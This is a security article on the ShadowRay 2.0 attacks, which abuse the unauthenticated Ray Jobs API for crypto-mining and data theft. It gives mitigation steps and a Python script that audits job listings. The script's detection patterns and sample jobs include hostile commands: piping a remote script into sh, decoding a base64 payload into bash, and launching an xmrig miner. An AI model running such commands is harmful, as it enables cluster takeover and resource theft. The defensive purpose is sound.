ShadowRay 2.0 attacks expose Ray clusters to a new wave of crypto-mining and data-theft activity. Threat actors now exploit a long-standing job-submission flaw to run malicious tasks across distributed AI and machine-learning environments. Organisations that deploy Ray clusters for research, training or large-scale computation face elevated risk when they leave control interfaces exposed or under-secured.

How ShadowRay 2.0 Works

The ShadowRay 2.0 campaign exploits a vulnerability in the Ray Jobs API that allows attackers to submit arbitrary tasks without authentication. Once the attacker reaches the exposed interface, they can submit payloads that the cluster automatically schedules and executes across its nodes. This process lets the intruder take control of the entire cluster in a single step.

After gaining control, the attacker deploys Bash and Python scripts that propagate across nodes. The payload drops a tuned crypto-miner, typically configured to stay hidden by masking its CPU and GPU usage. The miner uses Ray’s distributed compute layer to maximize output. The malicious scripts also block competing miners by modifying host rules or firewall entries.

ShadowRay 2.0 doesn’t stop at mining. The payload opens remote shells, extracts credentials, copies proprietary AI models and siphons sensitive project files. Some variants also include DDoS modules that turn Ray nodes into traffic-generation bots. Because Ray manages workloads with elevated privileges, the attacker inherits a powerful, high-trust environment.

Why This Attack Matters

Ray clusters power AI workflows, reinforcement-learning training runs, distributed Python apps and data-processing pipelines. Many organisations deploy them quickly and assume internal-only access. ShadowRay 2.0 targets this assumption. Thousands of clusters run on public networks or weakly segmented private ranges, giving attackers an easy path to takeover.

Once attackers convert a cluster into a mining botnet, they degrade performance, corrupt workloads, and cause financial and operational damage. When they access models and datasets, the risk escalates further. Stolen models may contain proprietary research, intellectual property or sensitive training material.

What Organisations Must Do

Teams running Ray clusters must take immediate action:

  • Scan for publicly reachable Ray interfaces and isolate them from the internet.
  • Restrict port 8265 (the Ray dashboard and Jobs API port) and other control APIs to trusted internal zones.
  • Enable authentication on job-submission endpoints and cluster-management interfaces.
  • Audit cluster tasks for suspicious submissions, unusual names or repeated job scheduling.
  • Inspect nodes for high CPU or GPU usage, unfamiliar processes and altered cron jobs.
  • Review outbound traffic patterns for signs of mining pools or unauthorized data transfers.

Continuous monitoring plays a crucial role because ShadowRay spreads through internal scheduling mechanisms. Logging, telemetry and behavioural alerts help teams respond before the cluster converts into a full botnet.
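The audit steps above (suspicious submissions, repeated job scheduling, mining-pool indicators) can be scripted against the job listing the cluster already keeps. The following is an added example written for this article; it is not the article's own material and not Ray project code. It assumes job records shaped like the JSON the Ray Jobs API returns from GET /api/jobs/ (fields such as "submission_id", "entrypoint", "status" and "start_time" in milliseconds); the records, IP address, file names and detection thresholds below are constructed for demonstration, and the regular expressions are illustrative heuristics rather than an authoritative signature set.

```python
"""Audit a Ray Jobs API listing for suspicious submissions.

Added example (not part of the original article, not Ray project code).
Assumes job records shaped like the Ray Jobs API output of GET /api/jobs/:
"submission_id", "entrypoint", "status", "start_time" (ms since epoch).
Fetch that listing with any HTTP client and pass the decoded list to
audit_jobs(); SAMPLE_JOBS below is constructed for demonstration.
"""
import re
from collections import defaultdict

# Illustrative heuristics for entrypoints that fetch-and-run remote code,
# decode an embedded payload, start a miner, or edit host/cron/firewall state.
SUSPICIOUS_PATTERNS = {
    "download-and-execute": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b"),
    "encoded-payload": re.compile(r"base64\s+(-d|--decode)"),
    "miner-indicator": re.compile(r"(xmrig|stratum\+tcp|stratum\+ssl)", re.I),
    "persistence-edit": re.compile(r"(crontab|/etc/cron|/etc/hosts|iptables)"),
}

# Constructed sample listing: one benign training job, three suspicious
# single jobs, and a burst of six identical submissions within a few seconds.
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_001", "entrypoint": "python train.py --epochs 10",
     "status": "RUNNING", "start_time": 1_700_000_000_000},
    {"submission_id": "raysubmit_002",
     "entrypoint": "curl -s http://198.51.100.7/x.sh | sh",
     "status": "SUCCEEDED", "start_time": 1_700_000_010_000},
    {"submission_id": "raysubmit_003",
     "entrypoint": "echo cHl0aG9uIC1j | base64 -d | bash",
     "status": "SUCCEEDED", "start_time": 1_700_000_020_000},
    {"submission_id": "raysubmit_004",
     "entrypoint": "./xmrig -o stratum+tcp://pool.example.invalid:3333",
     "status": "RUNNING", "start_time": 1_700_000_030_000},
] + [
    {"submission_id": f"raysubmit_1{i:02d}", "entrypoint": "python spread.py",
     "status": "SUCCEEDED", "start_time": 1_700_000_100_000 + i * 1_000}
    for i in range(6)
]


def flag_job(job):
    """Return the names of every heuristic the job's entrypoint matches."""
    entrypoint = job.get("entrypoint", "")
    return [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(entrypoint)]


def find_repeated_entrypoints(jobs, threshold=5, window_ms=60_000):
    """Return {entrypoint: count} for commands submitted >= threshold times
    inside any window_ms-long window. Repeated scheduling of one command is
    the self-propagation pattern the article describes; threshold and window
    are assumed values to tune per cluster."""
    by_entrypoint = defaultdict(list)
    for job in jobs:
        by_entrypoint[job.get("entrypoint", "")].append(job.get("start_time", 0))
    repeated = {}
    for entrypoint, times in by_entrypoint.items():
        times.sort()
        left, best = 0, 0
        # Sliding window over sorted start times: largest count within window_ms.
        for right, t in enumerate(times):
            while t - times[left] > window_ms:
                left += 1
            best = max(best, right - left + 1)
        if best >= threshold:
            repeated[entrypoint] = best
    return repeated


def audit_jobs(jobs, threshold=5, window_ms=60_000):
    """Map submission_id -> list of reasons for every job worth a closer look."""
    findings = defaultdict(list)
    for job in jobs:
        for reason in flag_job(job):
            findings[job["submission_id"]].append(reason)
    repeated = find_repeated_entrypoints(jobs, threshold, window_ms)
    for job in jobs:
        count = repeated.get(job.get("entrypoint"))
        if count:
            findings[job["submission_id"]].append(f"repeated-submission x{count}")
    return dict(findings)


if __name__ == "__main__":
    for sid, reasons in sorted(audit_jobs(SAMPLE_JOBS).items()):
        print(f"{sid}: {', '.join(reasons)}")
```

Run it on a real listing by replacing SAMPLE_JOBS with the decoded response from the cluster's Jobs API, and feed the returned dict into whatever alerting pipeline the monitoring stack uses; the benign training job produces no finding, while each of the other entries is reported with the heuristic it tripped.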

Strategic Outlook

ShadowRay 2.0 demonstrates how attackers now target AI infrastructure rather than traditional servers. Modern clusters combine high compute power with weak access controls, making them ideal targets. Security teams must treat AI systems like mission-critical assets by enforcing zero-trust segmentation, strong authentication and frequent audits of internal APIs.

Conclusion

The ShadowRay 2.0 campaign turns Ray clusters into crypto-mining botnets and data-theft platforms. Organisations that rely on distributed AI infrastructure must secure their environments, restrict access and monitor for signs of compromise. Rapid action protects compute resources, preserves data integrity and prevents attackers from exploiting powerful cluster ecosystems.
